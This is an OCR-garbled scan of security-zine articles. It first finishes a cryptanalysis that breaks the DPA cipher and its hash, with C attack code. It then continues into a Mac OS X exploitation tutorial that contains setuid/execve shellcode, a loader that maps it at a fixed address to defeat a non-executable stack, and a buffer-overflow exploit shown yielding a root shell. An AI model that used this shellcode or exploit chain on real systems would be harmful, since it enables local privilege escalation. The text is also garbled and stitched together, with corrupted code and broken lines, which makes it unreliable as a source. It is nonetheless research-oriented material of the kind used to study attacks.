2? (1/0.125204) * 16 
274226068900783.2739747241633 

? Log (274226068900783.2739747241633) / log(2) 


47.96235905375676878381741198 
2 


This result tells us clearly that the probability of shift being multiple 
of 8 is around 1/2%2.99 ~ 1/8 per round which is assimilated to the 
theoretical one since the difference is too small to be significant. In 
order to improve the measure, we used checksuml128() as an input of 
hash32(). Furthermore, we also tried to test hash32() without the "*k &&" 
bug mentioned earlier. Both tests gave similar results which means that the 
bug is not important in practice and that checksum128() doesn’t seem to be 
particularly skewed. This is a good point for DPA! :-D 


--[ 8 - Breaking DPA-based unkeyed hash function 


In his paper, Veins also explains how a hash function can be built out of 
DPA. We will analyze the proposed scheme and will show how to completely 
break it. 


--[ 8.1 - Introduction to hash functions 


Quoting once again the excellent HAC [MenVan]: 
"A hash function is a function h which has, as a minimum, the following two 
properties: 
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1. compression - h maps an input x of arbitrary finit bitlength, to an 
output h(x) of fixed bitlength n. 
2. ease of computation - given h and an input x, h(x) is easy to compute. 


In cryptography there are essentially two families of hash functions: 


1. The MAC (Message Authentication Codes). They are keyed ones and provides 
both authentication (of source) and integrity of messages. 

2. The MDC (Modification Detection Code), sometimes referred as MIC. They 
are unkeyed and only provide integrity. We will focus on this kind of 
functions. When designing his hash function, the cryptographer generally 
wants it to satisfy the thr properties: 


preimage resistance. For any y, it should not be possible (that is to say 
computationally infeasible) to find an x such as h(x) = y. Such a property 
implies that the function has to be non invertible. 
-— 2nd preimage resistance. For any x, it should not be possible to find an 


x’ such as h(x) = h(x’) when x and x’ are different. 
—- collision resistance. It should not be possible to find an x and an x’ 
(with x different of x’) such that h(x) = h(x’). 


Remark 1: Properties 1 and 2 and essentials when dealing with binary 
integrity. 


Remark 2: The published attacks on MD5 and SHA-0/SHA-1 were dealing with the 
third property. While it is true that finding collisions on a hash function 
is enough for the crypto community to consider it insecure (and sometimes 
leads to a new standard [NIST2007]), for most of usages it still remains 
sufficient. 


There are many way to design an MDC function. Some functions are based on 
MD4 function such as MD5 or SHA* functions which heavily rely on boolean 

algebra and operations in GF(2%32), some are based on NP problems such as 
RSA and finally some others are block cipher based. 

The third category is particularly interesting since the security of the 
hash function can be reduced to the one of the underlying block cipher. 

This is of course only true with a good design. 


--[ 8.2 - DPAsum() algorithm 


The DPA-based hash function lies in the functions DPA_sum() and 
DPA_sum_write_to_file() which can be found respectively in file sum.c and 
data.c. 


Let’s detail them a little bit using pseudo code: 


Let M be the message to hash, let M(i) be the i’th 128b block message. 

Let N = DPA_BLOCK_SIZE * i+ j be the size in bytes of the message where i 
and j are integers such as i= N / DPA_BLOCK_SIZE and 0 <= 4 < 16. 

Let C be an array of 128 bits elements were intermediary results of hash 
calculation are stored. The last element of this array is the hash of the 
message. 


func DPA_sum(KO,M,C): 


KO = key ("deadbee£") ; 
IV = "0123456789abcdef"; 


( IV ; KO); 
( IV xor M(0) , KO); 
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C(it+l) = E( C(i) xor 000...000 , KO) 
else 

C(itl) = E( C(i) xor PAD( M(i) ); 

C(it2) = E( C(it+l) xor 000...00S , KO) /* s = 16-4 */ 
return; 


func DPA_sum_write_to_file(C, file): 


write(file,C(last_element) ); 
return; 


--[ 8.3 - Weaknesses in the design/implementation 
We noticed several implementation mistakes in the code: 


a) Using the algorithm of hash calculation, every element of array C is 
defined recursively however C(0) is never used in calculation. This doesn’t 
impact security in itself but is somewhat strange and could let us think 
that the function was not designed before being programmed. 


b) When the size of M is not a multiple of DPA_BLOCK_SIZE (j is not equal 

to 0) then the algorithms calculates the last element using a xor mask where 
the last byte gives information on the size of the original message. 
However, what is included in the padding is not the size of the message in 
itself but rather the size of padding. 


If we take th xample of the well known Merkle-Damgard construction on 
which are based MD{4,5} and SHA-{0,1} functions, then the length of the 
message was initially appended in order to prevent collisions attacks for 
messages of different sizes. Therefore in the DPASum() case, appending j 

to the message is not sufficient as it would be possible to find collisions 
for messages of size (DPA_BLOCK_SIZE*a + j) and (DPA_BLOCK_SIZE*b + Jj) were 
obviously a and b are different. 


Remark: The fact that the IV and the master key are initially fixed is not 
a problem in itself since we are dealing with MDC here. 


--[ 8.4 - A (2nd) preimage attack 


Because of the hash function construction properties, being given a 
message X, it is trivial to create a message X’ such as h(X) = h(X’). This 
is called building a 2nd preimage attack. 


We built a quick & dirty program to illustrate it (Annexe C). It takes a 
32 bytes message as input and produces an other 32 bytes one with the same 
hash: 


S$ cat to.hack | hexdump -C 

00000000 58 41 4c 4b 58 43 4c 4b 53 44 4c 46 46 53 44 46 |XALKXCLKSDLFKSDF | 
00000010 58 4c 4b 58 43 4c 4b 53 44 4c 46 4b 53 44 46 Oa |XLKXCLKSDLFKSDF. | 
00000020 

S$ ./dpa -s to.hack 

6327b5becaab3e5c61a00430eE375b734 

S$ gcc break_hash.c *.o -o break_hash -I ./include 

S ./break_hash to.hack > hacked 

S ./dpa -s hacked 

6327b5becaab3e5c61a00430eE375b734 

S$ cat hacked | hexdump -C 

00000000 43 4f 4d 50 4c 45 54 45 4c 59 42 52 4f 4b 45 4e |COMPLETELYBROKEN | 


00000010 3e bf de 93 d7 17 Je 1d 2a c7 c6 70 66 bb eb a3 |>..... BR AAO ties | 
00000020 
Nice isn’t it ? :-) We were able to write arbitrary data in the first 16 


bytes and then to calculate the next 16 bytes so that the /’hacked’ file had 
the exact same hash. But how did we do such an evil thing? 
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Assuming the size of both messages is 32 bytes then: 


h(Mi) = E(E(Mi(0) xor IV,KO) xor Mi(1),K0O) 


Therefore, it is obvious that: 


h(M1) = h(M2) is equivalent to 
B(E(M1(0) xor IV,KO) xor M1(1),K0) = 


[7] 
a 


E(M2(0) xor IV,KO) xor M2(1),KO) 


Which can be reduced to: 
E(M1(0) xor IV,KO) xor M1(1) = E(M2(0) xor IV,KO) xor M2(1) 


Which therefore gives us: 
M2(1) = E(M2(0) xor IV,KO) xor E(M1(0) xor IV,KO) xor M1 (1) [A] 


Since M1,1IV,KO are known parameters then for a chosen M2(0), [A] gives us 
M2(1) so that h(M1) = h(M2). 


Remark 1: Actually such a result can be easily generalized to n bytes 
messages. In particular, the attacker can put anything in his message and 
"correct it" using the last blocks (if n >= 32). 


Remark 2: Of course building a preimage attack is also very easy. We 
mentioned previously that we had for a 32 bytes message: 
h(Mi) = E(E(Mi(0) xor IV,KO) xor Mi(1),KO) 


a 


Therefore, Mi(1) = E*-1(h(Mi),KO) xor E(Mi(0) xor IV,KO) [B] 


The [B] equation tells us how to generate Mi(1) so that we have h(Mi) in 
output. It doesn’t seem to be really a one way hash function does it ? ;-) 
Building a hash function out of a block cipher is a well known problem in 
cryptography which doesn’t only involve the security of the underlying 
block cipher. One should rely on one of the many well known and heavily 
analyzed algorithms for this purpose instead of trying to design one. 


-—-[ 9 — Conclusion 


We put into evidence some weaknesses of the cipher and were also able to 
totally break the proposed hash function built out of DPA. In his paper, 
Veins implicitly set the bases of a discussion to which we wish to deliver 
our opinion. We claim that it is necessary to understand properly 
cryptology. The goal of this paper wasn’t to illustrate anything else but 
that fact. Being hacker or not, paranoid or simply careful, the rule is the 
same for everybody in this domain: nothing should be done without reflexion. 


[7-10 Greetings 


TF crypto dudes for friendly and smart discussions and specially X for 
giving me a lot of hints. I learned a lot from you guys :-) 

K40rl friends for years of fun ;-) Hi all :) 

Finally but not least my GF and her kindness which is her prime 
characteristic :> (However if she finds out the joke in the last sentence 
I may die :|) 
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[ Annexe A Breaking the linearised version 

8< 8< 8< 8< 8< 8< 

/* Crappy C/C++ source. I’m in a hurry for the paper redaction so don’t 


* blame me tooooco much please ! :> */ 
include <iostream> 

include <fstream> 

include <openssl/rc4.h> 
include <NTL/2Z.h> 

include <NTL/ZZ_p.h> 

include <NTL/mat_GF2.h> 
include <NTL/vec_GF2.h> 
include <NTL/GF2E.h> 

include <NTL/GF2XFactoring.h> 
include "dpa.h" 


using namespace NTL; 


void 
S_E2 (unsigned char *key, unsigned char *block, unsigned int s) 
{ 

int i; 

for (i = 0; i < DPA_BLOCK_SIZE; ++i) 

{ 

block[i] *= (key[i] * s) % 256; 

} 

return; 
} 
void 
E2 (unsigned char *key, unsigned char *block, unsigned int shift) 
{ 

rbytechain (block); 

rbitshift (block, shift); 

S_E2 (key, block, shift); 
} 
void 
DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst) 
{ 

int Jj; 

memcpy (dst, src, DPA_BLOCK_SIZE) ; 

for (j = 0; j < 16; jtt) 

E2 (key->subkey[j].key, dst, key->subkey[j].shift); 
return; 


} 


void affichage (unsigned char *chaine) 
{ 
ant. 1 
for(i=0; i<16; itt) 
printf ("%.2x", (unsigned char )chaine[i]); 
printf ("\n"); 
} 


"W 


unsigned char test_p[] "ABCD_ABCD_12 
unsigned char test_c1[16]; 
unsigned char test_c2[16]; 
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DPA_KEY key; 
RC4_KEY rc4_key; 


struct vect { 
unsigned char plaintxt[16]; 
unsigned char ciphertxt[16]; 


}; 


struct vect toto[128]; 
unsigned char srcl[16], src2[16]; 
unsigned char block1[16], block2[16]; 


int main() 


{ 


/* Key */ 
unsigned char str_key[] = " _323DFF?FF4cxsdA@&"; 
DPA_set_key (&key, str_key, DPA_KEY_SIZE); 


/* Init our RANDOM generator */ 

char time_key[16]; 

snprintf(time_key, 16, "%Sd%d", (int)time (NULL), (int)time(NULL) ); 
RC4_set_key (&rc4_key, strlen(time_key), (unsigned char *)time_key); 


/* Let’s crypt 16 plaintexts */ 
printf ("[{+] Generating the plaintexts / ciphertexts\n"); 


int i=0; 

int a=0; 

for P< L283 t4+) 

{ 
RC4(&rc4_key, 16, srcl, srcl); // Input is nearly random :;) 
DPA_ecb_encrypt (&key, srcl, blockl); 
RC4(&rc4_key, 16, srce2, src2); // Input is nearly random :;) 
DPA_ecb_encrypt (&key, src2, block2); 


for (a=0;a<16; att) 

{ 
toto[i].plaintxt[a] = srcl[a] * src2[a]; 
toto[i].ciphertxt[a] = blockl[a] * block2[a]; 


} 
/* Now the NTL stuff */ 


printf("({+] NTL stuff !\n"); 

vec_GF2 m2(INIT_SIZE,128); 

vec_GF2 B(INIT_SIZE,128); 

mat_GF2 M(INIT_SIZE,128,128); 

mat_GF2 Mf (INIT_SIZE,128,128); // The final matrix ! 
clear (Mf); 

clear (M); 
clear (m2); 
clear (B); 


Gt 
by 
Gt 
by 


/* Lets fill M correctly */ 


int k=0; 
int  j=0; 
for (k=0; k<128; k++) // each row ! 
{ 
for (i=0; i<16; i++) 
{ 
for(j=0; 3<8; jtt) 
M.put (1*8+)3,k, (toto[k].plaintxt[i] >> j)&0xl1); 
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GF2 d; 
determinant (d,M); 


/* if !det then it means the vector were linearly linked :’( */ 


if (IsZero (qd) ) 
{ 


std::cout << "det(M) = 0O\n" 
exit(1); 

} 

/* Let’s solve the 128 system :) */ 


printf("{+] Calculation of Mf\n"); 
for (k=0; k<16; k++) 
{ 


for(j=0; 3<8; jtt) 

for (i=0; i<128; itt) 
B.put (i, (toto[i].ciphertxt[k] >> Jj) &0xl1); 
Soteuh’. m2, M, B); 


ifdef __debug__ 

std::cout << "m2 is " << m2 << "\n"; 
endif 

int b=0; 


for (;b<128;b++) 
Mf.put (k*8+5,b,m2.get (b)); 


} 


#ifdef __debug__ 
std::cout << "Mf = " << ME << "\n": 
#fendif 


/* Now that we have Mf, let’s make a test ;) */ 


printf("[+] Let’s make a test !\n"); 
bzero(test_cl, 16); 

bzero(test_c2, 16); 

char DELTA _X[16]; 

char DELTA_Y[16]; 

bzero(DELTA_X, 16); 

bzero(DELTA_Y, 16); 

DPA_ecbh_encrypt (&key, test_p, test_cl); 


/ DELTA_X ! 

nsigned char UO[] = “ABCDEFGHABCDEFG1"; 
nsigned char YO[16]; 

PA_ecb_encrypt (&key, UO, YO); 


Oacam 


for(i=0; i<16; itt) 

{ 

DELTA_X[i] = test_p[i] * UO[i]; 
} 


// DELTA_Y ! 
vec_GF2 X(INIT_SIZI 
vec_GF2 Y(INIT_SIZI 
clear (X); 

clear (Y); 

for (k=0; k<16; k++) 
{ 


for(j=0; 3<8; jtt) 
{ 
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Y = ME * X; 
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X.put (k*8+ 4, (DELTA_X[k] 


>> 3) &0x1); 


ifdef __debug__ 
stds cout <<’ "X= "<< Xk << ™\nts 
std::cout << "Y = " << -yY <<) "\n": 
endif 
GF2 Zz; 
for (k=0; k<16; k++) 
{ 
for (j=0; 3<8; j++) 
{ 
Z= Y.get (k*8+j); 
if (IsOne (z) ) 
DELTA_Y[k] |= (1 << 4); 
} 
} 
// test_c2 ! 
for(i=0; i<16; i++) 
test_c2[i] = DELTA_Y[i] * YO[i]; 
/* Compare the two vectors */ 
if (!'memcmp (test_cl,test_c2,16) ) 
printf("\t=> Well done boy :>\n"); 
else 
printf£("\t=> Hell !@#\n"); 
ifdef __ debug__ 
affichage(test_cl); 
affichage(test_c2); 
endif 
return 0; 
} 
8< 8< 8< 8< 8< 8< 
[ Annexe B Probability evaluation of (hash32()%8 == 
8< 8< 8< 8< 8< 8< 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <time.h> 


define NBR_TESTS OxFFFFF 


int main() 


int i= 0, j = 
char buffer[16] 
int cmpt = 0; 
int rand = ( 
float proba 
srandom(rand) ; 

for (;i<NBR_TESTS; i++) 
{ 


for(j=0; 3<4; Jtt) 
{ 


rand = random(); 


memcpy (buffer+4*4, &rand, 4); 
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checksum128 (buffer, buffer, 16); 
if (! (hash32 (buffer,16) %8) ) 
cmpttt; 
} 
proba = (float) cmpt/ (float)NBR_TESTS; 
printf("{+] Probability is around %f\n", proba); 
return 0; 


8< 8< 8< 8< 8< 8< 
[ Annexe C 2nd preimage attack on 32 bytes messages 
8< 8< 8< 8< 8< 8< 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <sys/types.h> 
include <sys/stat.h> 
include <fcntl.h> 
include "dpa.h" 


void 
E2 (unsigned char *key, unsigned char *block, unsigned int shift) 


{ 


rbytechain (block); 
rbitshift (block, shift); 
S_E (key, block, shift); 


} 


void 
DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst) 
{ 


int Jj; 
memcpy (dst, src, DPA_BLOCK_SIZE) ; 
for (j = 0; j < 16; Jjt+t) 
E2 (key->subkey[j].key, dst, key->subkey[j].shift); 
return; 


} 


void affichage (unsigned char *chaine) 
{ 
int 17 
for(i=0; i<16; itt) 
printf ("%.2x", (unsigned char )chaine[i]); 
printf ("\n"); 
} 


int main(int argc, char **argv) 
{ 
DPA_KEY key; 
unsigned char str_key[] = "deadbeef"; 
unsigned char IV[] = "0123456789abcdef"; 
unsigned char evil_payload[] = "COMPLETELYBROKEN"; 
unsigned char DO[16],D1[16]; 
unsigned char final_message[32]; 
int fd_r = 0; 
int i = 0; 


if(arge < 2) 

{ 
printf ("Usage : %s <file>\n",argv[0]); 
exit (EXIT_FAILURE) 


‘és 


} 


DPA_set_key (&key, str_key,8); 
if((fd_r = open(argv[1], O_RDONLY)) < 0) 
{ 
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print 
exit ( 


} 


if (read (f 
{ 
print 
exit ( 


} 


if (read(f 
{ 

print 

exit ( 
} 
close (fd_ 
memcpy (fi 
blockchai 
DPA_ecb_e 
blockchai 
DPA_ecb_e 
blockchai 
blockchai 
memcpy (fi 


for (i=0; 
print 
return 0; 


Wed Apr 26 
£("[+] Fuck 


d_r, DO, 16) 


09:43:45 2017 
1@#\n") ; 


EXIT_FAILURE) ; 


f£("Too short !@#\n"); 


d_r, Dl, 16) 


EXIT_FAILURE) ; 


f£("Too short 2 !@#\n"); 


vr); 


n(DO,IV); 


n(DO,D1); 


nal_message+ 


i1<DPA_BLOCK_ 


nal_message, 
n(evil_payload, IV); 
ncerypt (&key, 


EXIT_FAILURE) ; 


nerypt (&key, DO, DO); 


n(evil_payload, DO); 


= 


tDPA_BLOCK_SIZI 


G 


!= DPA_BLOCK_SIZ 


!= DPA_BLOCK_SIZ 


evil_payload, 


22 


GJ 
~~ 


Gl 
~~ 


evil_payload, DPA_BLOCK_SIZE); 


evil_payload) ; 


evil_payload, DPA_BLOCK_SIZ 


SIZE*2; i++) 


£("$e", final 


| _message[i]); 


17 


GJ 


8< 


8< 8< 


8< 8< 
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--[ 1 - Introduction 
This paper was written in order to document my research while 
playing with Mac OS X shellcode. During this process, however, 


the paper mutated and evol 
related topics which will 


Due to the growing popul 


shown are still applicabl 
implementation is left as 


lved to cover a selection of Mac OS X 
hopefully make for an interesting read. 


larity of Mac OS X on Intel over PowerPC platforms, 
I have mostly focused on techniques for the former. 
e on PowerPC architecture, 


Many of the concepts 
but their particular 
an excercise for the reader. 


There are already several 


well written documents on PowerPC and 


Intel assembly language; 


I wil 


ll therefore make no attempt to try 


and teach you these things. 


If you have any suggestions on how to shorten/tighten the code I 


have written for this paper pl 


nemo@felinemenace.org. 


A tar file containing the 


lease drop me an email with the details at: 


full code listings referenced in this paper 


can be found in Appendix A. 
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--[ 2 - Local shellcode maneuvering. 


Over the years there have been many different techniques 
developed to calculate valid return addresses when 
exploiting buffer overflows in applications local to 
your system. Unfortunately many of these techniques are 
now obsolete on Intel-based Mac OS X systems with the 
introduction of a non-executable stack in version 10.4 
(Tiger). 


In the following subsections I will discuss a few historical 
approaches for calculating shellcode addresses in memory 

and introduce a new method for positioning shellcode at a 
fixed location in the address space of a vulnerable target 
process. 


--[ 2.1 Historical perspective 1: Alephl 


Over the years there have been many different techniques 
developed to calculate a valid return address when exploiting 

a buffer overflow in an application local to your system. 

The most widely known of these is shown in alephl’s "Smashing 
the Stack for Fun and Profit". [9] In this paper, alephl simply 
writes a small function get_sp() shown below. 


unsigned long get_sp(void) { 
__asm__("movl %Sesp, %eax"); 


} 


This function returns the current stack pointer (esp). 

alephl then simply offsets from this value, in an attempt to hit 
the nop sled before his shellcode on the stack. This method is 

not as precise as it can be, and also requires the shellcode to 

be stored on the stack. This is an obvious issue if your stack is 
non-executable. 


--[ 2.2 Historical perspective 2: Radical Environmentalist 


Another method for storing shellcode and calculating the address 
of it inside another process is shown in the Radical 
Environmentalist paper written by the Netric Security Group [10]. 


In this paper, the author shows that the execve() syscall allows 
full control over the stack of the freshly executed process. 
Because of this, shellcode can be stored in an environment 
variable, the address of which can be calculated as displacement 
from the top of the stack. 


In older exploits for Mac OS X (prior to 10.4), this technique 
worked quite well. Since there is no non-executable stack on 
PowerPC 


--[ 2.3 Beating stack prot :P or whatever 


In KF’s paper "Non eXecutable Stack Loving on Mac OS X86" [11], 
the author demonstrates a technique for removing stack protection 
by returning into mprotect() in libSystem (libc) before 

returning into their payload. While this technique is very useful 
for remote exploitation, a more elegant solution to this problem 
exists for local exploitation. 


he first step to getting our shellcode in place is to get some 
hellcode. There has already been significant published work 

n this area. If you are interested to learn how to write 
hellcode for Mac OS X for use in local privilege escalation 
xploits, a couple of papers you should definitely check out are 
hown in the references section. [1] and [8]. The shellcode 
hosen for the sample code is described in full in section 2 


QnOdnrH- DN +H 
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The method which I now propose relies on an undocumented the 
undocumented Mac OS X system call "Shared_region_mapping_np". 
This syscall is used at runtime by the dynamic loader (dyld) 
to map widely used libraries across the address space of every 
process on the system; this functionality has many evil uses. 


[The file /usr/include/sys/syscalls.h contains the syscall 
number for each of the syscalls. Here is the appropriate 
line in that file which contains our syscall. 


#define SYS_shared_region_map_file_np 299 
Here is the prototype for this syscall: 


struct shared_region_map_file_np( 
int £a, 
uint32_t mappingCount, 
user_addr_t mappings, 
user_addr_t slide_p 

i 


The arguments to this syscall are very simple: 


fd an open file descriptor, providing access to data that 
we want loaded in memory. 

mappingCount the number of mappings which we want to make from the 
file. 

mappings a pointer to an array of _shared_region_mapping_np 
structs which describe each mapping (see below). 

slide_p determines whether the syscall is allowed to slide 


the mapping around inside the shared region of memory 


to make it fit. 


Here is the struct definition for the elements of the third argument: 


struct _shared_region_mapping_np { 


mach_vm_address_t address; 
mach_vm_size_t size; 
mach_vm_offset_t file_offset; 
vm_prot_t max_prot; 
vm_prot_t init_prot; 


}; 


The struct elements shown above can be explained as followed: 


address the address in the shared region where the data 
be stored. 

size the size of the mapping (in bytes) 

file_offset the offset into the file descriptor to which we 
seek in order to reach the start of our data. 


his is the maximum protection of the mapping, 
his value is created by or’ing the #defines: 


max_prot 


his is the initial protection of the mapping, 
this is created by or’ing the values mentioned 


init_prot 


The following #define’s describe the shared region in which 
we can map our data. They show the various regions within the 
Ox00000000->0xffffffff address space which are available to 
use as shared regions. These are shown as defined as starting 
point, followed by size. 


define SHARED_LIBRARY_SERVER_SUPPORTED 

define GLOBAL _SHARED_TEXT_SEGMENT 0x90000000 
define GLOBAL _SHARED_DATA_SEGMENT 0xA0000000 
define GLOBAL _SHARED_SEGMENT_MASK OxF0000000 


should 


must 


t 
VM_PROT_EXECUTE, VM_PROT_READ, VM_PROT_WRITE and VM_COW. 


again 
above. 
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define SHARED_TEXT_REGION_SIZE 0x10000000 
define SHARED_DATA_REGION_SIZE 0x10000000 
define SHARED _ALTERNATE_LOAD_BASE 0x09000000 


o reduce the chance that our shellcode offset will be 
stored at an address that does not contain a NULL byte 
(thereby making this technique viable for string based 
overflows), we position the shellcode at the last address in 
the region where a page (0x1000 bytes) can be mapped. By 
doing so, our shellcode will be stored at the address 
Ox9ffffxxx. 


The following code can be used to map some shellcode into 

a fixed location by opening the file "/tmp/mapme" and writing 
our shellcode out to it. It then uses the file descriptor 

to call the "shared_region_map_file_np" which maps the 

code, as well as a bunch of int3’s (cc), into the shared 
region. 


/* 


* [ sharedcode.c ] 


* by nemo@felinemenace.org 2007 


7 

include <stdio.h> 

include <stdlib.h> 

include <fcntl.h> 

include <sys/syscall.h> 
include <sys/types.h> 

include <mach/vm_prot.h> 
include <mach/i386/vm_types.h> 
include <mach/shared_memory_server.h> 
include <string.h> 

include <unistd.h> 

define BASE_ADDR O0x9ffff000 
define PAGESIZE 0x1000 

define FILENAME "/tmp/mapme" 


char dual_sc[] = 
"\x5f£\x90\xeb\x60" 


// setuid() seteuid() 

"\x38\x00\x00\xb7\x38\x60\x00\x00" 
"\x44\x00\x00\x02\x38\x00\x00\x17" 
"\x38\x60\x00\x00\x44\x00\x00\x02" 


// ppc execve() code by b-r00t 

"\x7c\xa5\x2a\x79\x40\x82\xff\xfda" 
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70" 
"\x39\x40\x01\x70\x39\x1lf\xfe\xcf" 
"\x7c\xa8\x29\xae\x38\x7£\xfe\xc8" 
"\x90\x61\xf£\x£8\x90\xal\xff£\xfc" 
"\x38\x81\xff\xf8\x38\x0a\xfe\xchb" 
"\x44\xff£\xf£\x02\x7c\xa3\x2b\x78" 
"\x38\x0a\xfe\x91\x44\xff\xff£\x02" 
"\x2£\x62\x69\x6e\x2£\x73\x68\x58" 


F Fh Fh Ft 


// seteuid(0); 
"\x31\xc0\x50\xb0\xb7\x6a\x7£\xcd" 
Ww \x80" 

// setuid(0); 
"\x31\xc0\x50\xb0\x17\x6a\x7£\xcd" 
WwW \x80O" 

// x86 execve() code / nemo 
"\x31\xc0\x50\x68\x2f£\x2£\x73\x68" 
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"\x68\x2£\x62\x69\x6e\x89\xe3\x50" 
"\x54\x54\x53\x53\xb0\x3b\xcd\x80"; 


struct _shared_region_mapping_np { 


mach_vm_address_t address; 

mach_vm_size_t size; 

mach_vm_offset_t file_offset; 

vm_prot_t max_prot; /* rvread/write/execute/COW/ZF */ 
vm_prot_t init_prot; /* read/write/execute/COW/ZF */ 


}; 


int main(int argc,char **argv) 


{ 


int fd; 

struct _shared_region_mapping_np sr; 

chr data[PAGESIZE] = { Oxcc }; 

char *ptr = data + PAGESIZE —- sizeof (dual_sc); 

sr.address = BASE_ADDR; 

sr.size = PAGESIZE; 

sxr.file_offset = 0; 

sr.max_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; 
sr.init_prot = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE; 
if ( (fd=open (FILENAME, O_RDWR|O_CREAT) ) ==-1) 


{ 


perror ("open"); 
exit (EXIT_FAILURE) ; 


} 


memcpy (ptr, dual_sc, sizeof (dual_sc))j; 


if (write (fd,data,PAGESIZE) != PAGESIZE) 
{ 


perror ("write"); 
exit (EXIT_FAILURE) ; 


} 


if (syscall (SYS_shared_region_map_file_np, fd,1,&sr,NULL) ==-1) 
{ 

perror("shared_region_map_file_np"); 

exit (EXIT_FAILURE) ; 


} 


close (fd); 
unlink (FILENAME) ; 


printf("{+] shellcode at: 0x%x.\n",sr.address + 
PAGESIZE — 
sizeof (dual_sc)); 


exit (EXIT_SUCCESS) ; 


} 
/* ay 


When we compile and execute this code, it prints the address of 
the shellcode in memory. You can see this below. 


[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode 
[nemo@fry:~/code]$ ./sharedcode 
+] shellcode at: Ox9fffff71. 


[ 


As you can s the address used for our shellcode is Ox9fffff71. 
This address, as expected, is free of NULL bytes. 


You can test that this procedure has worked as expected by 
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starting a new process and connecting to it with gdb. 


By jumping to this address using the "jump" command in gdb 


our shellcode is ex 


—[nemo@fry: 
GNU gdb 6.3 
(gdb) r 


Starting program: /usr/bin/id 


cuted and a bash prompt is displayed. 


~/code]$ gdb /usr/bin/id 
-50-20050815 (Apple version gdb-563) 


“C[Switching to process 752 local thread 0xf03] 
Ox8fe01010 in dyld__dyld_start () 


*Ox9fffff71 


Continuing at Ox9fffff71. 


Quit 

(gdb) jump 
(gdb) c 
Continuing. 


—[nemo@fry:Users/nemo/code]$ 


In order to demonstrate how this can be used in an exploit, 
I have created a trivially exploitable program: 


/* 


* exploitme.c 


*/ 


int main(int ac, char **av) 


{ 


} 


char buf[50] = { 
printf ("Ss",av[1] 


if(ac 


== 2) 
strcpy (buf,av[1]); 


return 1; 


Below is the exploit for the above program. 


/* 


Al 


exp.c ] 


* nemo@felinemeance.org 2007 


sf 


inc 
inc 


} 


As you can see we fill the buffer up with "A"’s, 


return address calculated by sharedcode.c. After the strcpy() 


define VULNP 
define OFFSET 66 
define FIXEDADDR Ox9fffff71 


5 


lude <stdio.h> 
lude <stdlib.h> 


ROG "./exploitme" 


int main(int ac, char **av) 


char evilbuff [OFFSET]; 

char *args[] = {VULNPROG, evilbuff,NULL}; 
char *env[] = {"TERM=xterm",NULL}; 

long *ptr = (long *)&(evilbuff[OFFSET - 4]); 


memset (evilbuff,’A’,OFFSET) ; 
*otr = FIXEDADDR; 


execve (*args,args,env) ; 
return 1; 


followed by our 


occurs 


our stored return address on the stack is overwritten with our new 
return address (0x9fffff71) and our shellcode is executed. 
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If we chown root /exploitme; chmod +s /exploitme; we can see 

that our shellcode is mapped into suid processes, which makes 

this technique feasible for local privilege escalation. Also, 
because we control the memory protection on our mapping, we bypass 
non-executable stack protection. 


—[nemo@fry:/]$ ./exp 
fry:/ root# id 
uid=0 (root) 


One limitation of this technique is that the file you are 
mapping into the shared region must exist on the root file- 
system. This is clearly explained in the comment below. 


/* 
* The split library is not on the root filesystem. We don’t 
* want to pollute the system-wide ("default") shared region 
* with it. 

* Reject the mapping. The caller (dyld) should "privatize" 
* (via shared_region_make_private()) the shared region and 
* try to establish the mapping privately for this process. 
* 


] 


Another limitation to this technique is that Apple have locked 
down this syscall with the following lines of code: 


* 


* This system call is for "dyld" only. 


* 


Luckily we can beat this magnificent protection by.... 
completely ignoring it. 


--[{ 3 - Resolving Symbols From Shellcode 


In this section I will demonstrate a method which can be used to 
resolve the address of a symbol from shellcode. 


This is useful in remote exploitation where you wish to access 
or modify some of the functionality of the vulnerable program. 
This may also be useful in calling some of the functions ina 
particular shared library in the address space. 


7 


he examples in this section are written in Intel assembly, nasm 
syntax. The concepts presented can easily be recreated in 
PowerPC assembler. If anyone takes the time to do this let me 
know. 


The method I will describe requires some basic knowledge about 
the Mach-O object format and how symbols are stored/resolved. 
I will try to be as verbose as I can, however if more research 
is required check out the Mach-O Runtime document from the 
Apple website. [4] 


The process of resolving symbols which I am describing in this 
section involves locating the LINKEDIT section in memory. 


The LINKEDIT section is broken up into a symbol table (symtab) 
and string table (strtab) as follows: 


[ LINKEDIT SECTION ] 


low memory: 0x0 

. , 
|---(symtab data starts here.)---| 
|<nlist struct> | 
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<n 
<n 


list struct> 
list struct> 


—---(strtab data starts here.)--- 
" mh_execute_header\0" 
"dyld_start\0" 

"main" 


himem : Oxffffffff 


By locating the start of the string table and the start of the 
symbol table relative to the address of the LINKEDIT section 

it is then possible to loop through each of the nlist structures 
in the symbol table and access their appropriate string in 


the 


string table. I will now run through this technique in fine 


detail. 


To resolve symbols we will start by locating the mach_header in 
memory. This will be the start of our mapped in mach-o image. 


One 
and 


way to find this is to run the "nm" command on our binary 
locate the address of the __mh_execute_header symbol. 


Currently on Mac OS X, the executable is simply mapped in at 


the 


start of the first page. 0x1000. 


We can verify this as follows: 


—[nemo@fry:~]$ nm /bin/sh | grep mh_ 
00001000 A __mh_execute_header 


(gdb) x/x 0x1000 
0x1000: Oxfeedface 


As you can see the magic number (Oxfeedface) is at 0x1000. 
This is our Mach-O header. The struct for this is shown 
below: 


struct mach_header 

{ 
uint32_t magic; 
cpu_type_t cputype; 
cpu_subtype_t cpusubtype; 
uint32_t filetype; 
uint32_t ncemds; 
uint32_t sizeofcmds; 
uint32_t flags; 

}; 


In my shellcode I assume that the file we are parsing always 


has 


a LINKEDIT section and a symbol table load command 


(LC_SYMTAB). This means that I do not bother parsing the 
mach_header struct. However if you do not wish to make this 
assumption, it is easy enough to loop nemds number of times 


whil 


le parsing the load commands. 


Directly after the mach_header struct in memory are a bunch 


of 


load_commands. Each of these commands begins with a "cmd" 


id field, and the size of the command. 


Therefore, we start our code by setting ecx to the address of 


the 


first load command, directly after the mach_header struct 


in memory. This positions us at Oxl0lc. We then null out some 
of the registers to use later in the code. 


;# null out some stuff (ebx,edx,eax) 
xor ebx, ebx 
mul ebx 
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;# position ecx past the mach_header. 
